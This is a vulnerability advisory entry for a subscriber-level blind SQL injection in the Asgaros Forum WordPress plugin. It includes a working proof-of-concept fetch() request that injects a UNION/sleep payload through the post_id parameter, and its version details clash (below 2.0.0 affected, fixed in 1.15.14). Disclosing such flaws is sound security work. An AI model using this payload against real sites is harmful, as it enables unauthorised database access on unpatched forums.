WordPress Plugin Vulnerabilities
Asgaros Forum < 2.0.0 - Subscriber+ Blind SQL Injection
Description
The plugin does not sanitise and escape the post_id parameter before using it in a SQL statement via a REST route of the plugin (accessible to any authenticated user), leading to a SQL injection
Proof of Concept
As any authenticated user, such as subscriber
To get the nonce: /wp-admin/admin-ajax.php?action=rest-nonce
fetch("?rest_route=/asgaros-forum/v1/reaction/1/hello", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": "post_id=1 UNION SELECT 1, 1, 1, 1, 1,2,3,4,5,sleep(5) FROM dual -- g&_wpnonce=59c63b25b1",
"method": "POST",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
Affects Plugins
Fixed in version 1.15.14
References
Classification
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
Timeline
Publicly Published
2022-01-31 (about 8 months ago)
Added
2022-01-31 (about 8 months ago)
Last Updated
2022-04-12 (about 5 months ago)